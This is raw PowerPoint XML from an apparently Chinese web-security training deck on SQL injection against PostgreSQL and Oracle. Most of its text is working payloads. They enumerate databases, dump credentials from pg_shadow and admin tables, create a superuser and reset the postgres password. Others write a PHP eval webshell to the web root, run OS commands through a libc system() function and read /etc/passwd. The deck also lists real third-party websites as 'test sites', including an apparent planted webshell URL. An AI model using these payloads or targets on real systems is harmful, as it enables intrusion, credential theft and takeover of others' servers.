              <a:t>数据库注入常用语法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判断数据库版本信息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union select null,version(),null--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判断用户权限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union+select+null,current_schema(),null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判断当前数据库名称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union+select+null,current_database(),null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判断当前表名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union+select+null,relname,null from pg_stat_user_tables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读取每个表的列名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union+select+null,column_name,null+from+information_schema.columns+where+table_name='表名'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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库注入常用语法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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列字段内容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+union+select+null,name||pass,null+from+admin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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库的账号密码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+union+select+null,usename||chr(124)||passwd,null+from+pg_shadow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创建用户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;create+user+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>seven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+with+superuser+password+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>seven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'--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修改postgres的用户密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>123456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;alter+user+postgres+with+password+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'--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4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Postgresql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>shell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oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据库介绍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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库系统是美国</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORACLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>公司（甲骨文）提供的以分布式数据库为核心的一组软件产品。是目前世界上使用最为广泛的数据库管理系统。基于“客户端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服务器”模式结构，客户端应用程序与用户交互，接收用户信息，并向服务器发送请求，服务器系统负责管理数据信息和各种操作数据的活动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    1 支持多用户、大事务量的处理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    2 数据安全性和完整性的有效控制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    3 支持分布式数据处理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0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    4 移植性强</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill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写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell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直接拿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（创建表，写入一句话，将该表复制到网站根目录下更改文件后缀）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http://127.0.0.1/sql.php?id=1;create table shell(shell text not null);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http://127.0.0.1/sql.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;insert into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> values($$&lt;?php @eval($_POST[cracer]);?&gt;$$); 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http://127.0.0.1/sql.php?id=1;copy shell(shell) to '/var/www/html/shell.php';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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>另一种方法：一步到位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注意是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传参</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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;copy (select '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>$$&lt;?php @eval($_POST[cracer]);?&gt;$$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>') to E:/web/postgresqlInject/ddd.php'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读取文件前20行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pg_read_file('/etc/passwd',1,20)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system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用于版本大于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的数据库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创建一个system的函数：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create FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT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创建一个输出表：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create table stdout(id serial, system_out text)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执行shell，输出到输出表内：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select system('uname -a &gt; /tmp/test')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copy 输出的内容到表里面；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COPY stdout(system_out) FROM '/tmp/test'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从输出表内读取执行后的回显，判断是否执行成功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union all select NULL,(select stdout from system_out order by id desc),NULL limit 1 offset 1–-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数据库备份还原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备份数据库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pg_dump -O -h 168.192.0.5 -U postgres mdb &gt;c:\mdb.sql”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pg_dump -O -h 192.168.0.5 -U dbowner -w -p 5432 SS &gt;SS.sql 这个是远程备份数据库备份到本地来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还原数据库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psql -h localhost -U postgres -d mdb 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判断注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="文本占位符 30722"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900632" y="1974909"/>
            <a:ext cx="11055350" cy="452844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‘      报错</a:t>
            </a:r>
          </a:p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and 1=1 返回正常</a:t>
            </a:r>
          </a:p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and 1=2 返回错误</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="图片 307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8" y="1165225"/>
            <a:ext cx="5700712" cy="2389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307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3656013"/>
            <a:ext cx="4872037" cy="2619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8" name="图片 307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13" y="3976688"/>
            <a:ext cx="5297487" cy="192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获取信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="文本占位符 31746"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028818" y="1812538"/>
            <a:ext cx="10200355" cy="905023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1905" marR="0" lvl="0" indent="-1905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1=cast(version() as int)  获取数据库版本信息系统信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1905" marR="0" lvl="0" indent="-35941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and 1=cast(user||123 as int)  获取当前用户名称  postgres用户相当于root用户权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39940" name="图片 31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27" y="2781364"/>
            <a:ext cx="7348537" cy="1585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图片 317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35" y="4234516"/>
            <a:ext cx="6616700" cy="2122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创建表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="文本占位符 32770"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1167539" y="2094550"/>
            <a:ext cx="8053373" cy="9221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;create table ccc(w text not null);  创建表x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40964" name="图片 32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17" y="3864851"/>
            <a:ext cx="8468051" cy="144996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265" y="732882"/>
            <a:ext cx="11218388" cy="1203860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>插入一句话木木</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="文本占位符 33794"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1421925" y="2101449"/>
            <a:ext cx="9644879" cy="170381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itchFamily="49" charset="-122"/>
              <a:buChar char=" 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;insert into ccc values($$&lt;?php @eval($_POST[cracer]);?&gt;$$);  向x表中插入一句话木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="图片 337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0" y="3969975"/>
            <a:ext cx="8600518" cy="1676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导出一句话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7898" y="2097024"/>
            <a:ext cx="9232692" cy="2289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;copy ccc(w) to $$/home/kasugai_tochi/public_html/script/cracer.php$$;  将一句话木马保存为cracer.php文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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菜刀连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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http://www.kasugai-tochi.jp/script/cracer.php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测试站点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http://www.e-hifarms.com/yellowpage/detail.jsp?id=111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://www.hbh-steel.com/index/news/news_list_xq.jsp?info_no=2183513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判断注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and 1=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>才有的表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and exists(select * from dual) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and exists(select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>user_tables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65" y="4448175"/>
            <a:ext cx="7956550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判断列数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order by 11   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>返回正常</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>order by 12    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>返回错误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131820"/>
            <a:ext cx="9424035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获取数据类型不匹配的列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http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,null,null,null,null,null,null,null,null,null,null from dual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3354898"/>
            <a:ext cx="9279932" cy="2431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获取数据类型不匹配的列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在每列上逐个用数字代替 如果返回正常说明该列为数字类型，反之则为非数字类型。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也可以逐个用引号引起来如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'null',null...from dual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>返回正常说明该列为字符类型，反之为非数字类型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01" y="3728747"/>
            <a:ext cx="9113805" cy="2372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2572</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>185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oracle数据库介绍</vt:lpstr>
      <vt:lpstr>测试站点</vt:lpstr>
      <vt:lpstr>判断数据库</vt:lpstr>
      <vt:lpstr>判断列数</vt:lpstr>
      <vt:lpstr>获取数据类型不匹配的列</vt:lpstr>
      <vt:lpstr>获取数据类型不匹配的列</vt:lpstr>
      <vt:lpstr>获取基本信息</vt:lpstr>
      <vt:lpstr>获取数据库版本</vt:lpstr>
      <vt:lpstr>获取操作系统版本</vt:lpstr>
      <vt:lpstr>获取连接数据库的当前用户</vt:lpstr>
      <vt:lpstr>获取第一个表</vt:lpstr>
      <vt:lpstr>获取第二个表</vt:lpstr>
      <vt:lpstr>获取第三个表</vt:lpstr>
      <vt:lpstr>获取第一个列名</vt:lpstr>
      <vt:lpstr>获取第二个表名</vt:lpstr>
      <vt:lpstr>获取第三个表名</vt:lpstr>
      <vt:lpstr>获取数据库</vt:lpstr>
      <vt:lpstr>第二种注入方式</vt:lpstr>
      <vt:lpstr>判断下该网站下有几个管理员</vt:lpstr>
      <vt:lpstr>指定表名获取列名</vt:lpstr>
      <vt:lpstr>获取列名</vt:lpstr>
      <vt:lpstr>接下来采用ASCII码折半法猜解管理员帐号和密码</vt:lpstr>
      <vt:lpstr>and (select count(*) from admin where ascii(substr(name,1,1))&gt;=97)=1 </vt:lpstr>
      <vt:lpstr>      and (select count(*) from admin where ascii(substr(name,2,1))&gt;=100)=1 结果为100，即字符d，重复上述过程，可以判断出帐号为admin</vt:lpstr>
      <vt:lpstr>相同的方法猜解密码</vt:lpstr>
      <vt:lpstr>    and (select count(*) from admin where ascii(substr(pwd,1,1))&gt;=97)=1，返回正常，为字符a </vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>注入工具</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>postgresql介绍 </vt:lpstr>
      <vt:lpstr>postgresql数据库注入常用语法</vt:lpstr>
      <vt:lpstr>postgresql数据库注入常用语法</vt:lpstr>
      <vt:lpstr>postgresql数据库注入常用语法</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>postgresql写shell</vt:lpstr>
      <vt:lpstr>创建system函数</vt:lpstr>
      <vt:lpstr>数据库备份还原</vt:lpstr>
      <vt:lpstr>判断注入</vt:lpstr>
      <vt:lpstr>获取信息</vt:lpstr>
      <vt:lpstr>创建表</vt:lpstr>
      <vt:lpstr>插入一句话木木</vt:lpstr>
      <vt:lpstr>导出一句话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WEB安全测试</dc:title>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>Cracer</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-09T14:59:33Z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